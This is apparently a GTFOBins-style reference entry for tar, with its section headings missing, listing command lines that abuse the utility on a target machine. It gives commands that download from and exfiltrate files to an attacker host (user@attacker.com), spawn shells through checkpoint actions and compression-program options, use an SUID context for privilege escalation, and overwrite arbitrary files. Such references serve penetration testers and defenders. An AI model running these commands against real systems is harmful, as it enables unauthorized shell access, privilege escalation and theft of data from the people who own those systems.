tar

Download

The attacker box must have the `rmt` utility installed.

tar xvf user@attacker.com:/path/to/input-file.tar --rsh-command=/bin/ssh

The file is read then passed to the specified command (e.g., `tar xO`) via standard input.

tar cf /dev/stdout /path/to/input-file -I 'tar xO'

The archive can also be prepared offline then uploaded to the target.

echo DATA >/path/to/temp-file
tar cf /path/to/temp-file.tar /path/to/temp-file
tar Pxf /path/to/temp-file.tar --xform s@.*@/path/to/output-file@

tar cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

tar xf /dev/null -I '/bin/sh -c "/bin/sh 0<&2 1>&2"'

SUID override:

tar xf /dev/null -I '/bin/sh -c "/bin/sh 0<&2 1>&2"'

The archive can also be prepared offline then uploaded to the target.

echo '/bin/sh 0<&1' >/path/to/temp-file
tar cf /path/to/temp-file.tar /path/to/temp-file
tar xf /path/to/temp-file.tar --to-command /bin/sh

The attacker box must have the `rmt` utility installed.

tar cvf user@attacker.com:/path/to/output-file /path/to/input-file --rsh-command=/bin/ssh